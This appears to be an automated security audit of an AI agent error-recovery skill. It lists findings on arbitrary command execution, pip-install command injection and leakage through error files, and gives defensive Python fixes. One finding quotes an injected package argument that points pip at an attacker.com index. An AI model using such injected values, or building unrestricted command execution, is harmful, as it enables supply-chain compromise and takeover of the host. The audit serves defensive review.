Security Audit
Sounder25/Google-Antigravity-Skills-Library:06_error_recovery
github.com/Sounder25/Google-Antigravity-Skills-Library

Trust Assessment
Sounder25/Google-Antigravity-Skills-Library:06_error_recovery received a trust score of 48/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Arbitrary Command Execution via User Input, Command Injection via Heuristic Auto-Fixes (pip install), and Potential Data Exfiltration via ERROR_STATE.json.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 28, 2026 (commit 09376edc). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Arbitrary Command Execution via User Input.** The skill accepts an arbitrary `--command` input and executes it; `SKILL.md` explicitly lists 'The command to execute' as a required input parameter. An attacker can therefore run any command on the host system where the skill executes, leading to full system compromise, data exfiltration, or denial of service. *Recommendation:* implement strict sandboxing for command execution, such as containerization or a highly restricted execution environment, or redesign the skill around a predefined set of safe operations rather than arbitrary command input. If arbitrary commands are absolutely necessary, implement robust input validation and sanitization, though this is extremely difficult to do securely for shell commands. | Static | SKILL.md:20 |
| HIGH | **Command Injection via Heuristic Auto-Fixes (pip install).** The skill's 'Supported Heuristics' include automatically running `pip install <module>` in response to a `ModuleNotFoundError`. If the `<module>` name can be influenced by untrusted input (e.g., file contents or a previous command's output), an attacker could inject malicious package names or additional pip arguments, such as `malicious_package --extra-index-url http://attacker.com`, leading to arbitrary code execution or supply-chain attacks. *Recommendation:* strictly validate the extracted `<module>` name against a whitelist of known safe modules, or sanitize it to prevent injection of additional arguments or malicious package names; consider using a virtual environment for all `pip install` operations to isolate dependencies. | Static | SKILL.md:34 |
| MEDIUM | **Potential Data Exfiltration via ERROR_STATE.json.** On failure, the skill writes an `ERROR_STATE.json` file containing the 'stack trace, context, and failed fix attempts'. Stack traces and error contexts can contain sensitive information such as file paths, environment variables, partial data, or internal system details; if this file is accessible to unauthorized entities or transmitted without sanitization, it could lead to information disclosure. *Recommendation:* review the contents of `ERROR_STATE.json` to ensure no sensitive data is inadvertently included, redact or sanitize potentially sensitive fields within stack traces and error contexts before writing the file, and ensure proper access controls on the file. | Static | SKILL.md:28 |
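For the critical finding, the recommended redesign around "a predefined set of safe operations rather than arbitrary command input" could be sketched as follows. The operation names and argument vectors here are illustrative assumptions, not part of the skill:

```python
import subprocess

# Hypothetical allowlist: each named operation maps to a fixed argument
# vector, so no user-supplied text is ever interpreted by a shell.
SAFE_OPERATIONS = {
    "run-tests": ["pytest", "-q"],
    "lint": ["ruff", "check", "."],
}

def run_safe(operation: str) -> subprocess.CompletedProcess:
    """Execute only a predefined operation; reject anything else."""
    argv = SAFE_OPERATIONS.get(operation)
    if argv is None:
        raise ValueError(f"operation not allowed: {operation!r}")
    # shell=False plus a fixed argv prevents injection of extra arguments.
    return subprocess.run(argv, shell=False, capture_output=True, text=True)
```

Because the mapping is closed, any string outside the allowlist (including shell metacharacters or full command lines) is rejected before anything is executed.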
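For the pip-install heuristic, the recommended whitelist validation of the extracted module name might look like this minimal sketch. The `KNOWN_SAFE` set and the name pattern are assumptions for illustration, not the skill's actual policy:

```python
import re

# Package-name pattern in the spirit of PEP 508: letters, digits, '.',
# '_', '-'. Spaces are rejected, which blocks flag injection such as
# "malicious_package --extra-index-url http://attacker.com".
_NAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9._-]*[A-Za-z0-9])?$")

# Hypothetical allowlist of modules the auto-fix may install.
KNOWN_SAFE = {"requests", "numpy", "pyyaml"}

def validate_module(name: str) -> str:
    """Return the name if it is well-formed and allowlisted, else raise."""
    if not _NAME_RE.fullmatch(name):
        raise ValueError(f"invalid package name: {name!r}")
    if name.lower() not in KNOWN_SAFE:
        raise ValueError(f"package not in allowlist: {name!r}")
    return name
```

Only a name that passes `validate_module` would then be handed to `pip install`, ideally inside a dedicated virtual environment as the finding suggests.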
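One way to implement the recommended redaction before writing `ERROR_STATE.json` is shown below. The redaction patterns are assumed examples of commonly sensitive content, not an exhaustive list:

```python
import json
import re

# Assumed examples of sensitive patterns in stack traces and contexts:
# credential-like assignments and user home paths.
_REDACT = [
    re.compile(r"(?i)(api[_-]?key|token|password|secret)\s*[=:]\s*\S+"),
    re.compile(r"/home/[^/\s]+"),
]

def sanitize(text: str) -> str:
    """Replace matches of each sensitive pattern with a fixed marker."""
    for pat in _REDACT:
        text = pat.sub("[REDACTED]", text)
    return text

def write_error_state(path, stack_trace, context, attempts):
    """Write the skill's failure state with sensitive fields redacted."""
    state = {
        "stack_trace": sanitize(stack_trace),
        "context": sanitize(context),
        "failed_fix_attempts": [sanitize(a) for a in attempts],
    }
    with open(path, "w") as f:
        json.dump(state, f, indent=2)
```

Pattern-based redaction is best-effort; restrictive file permissions on `ERROR_STATE.json` remain necessary, as the finding notes.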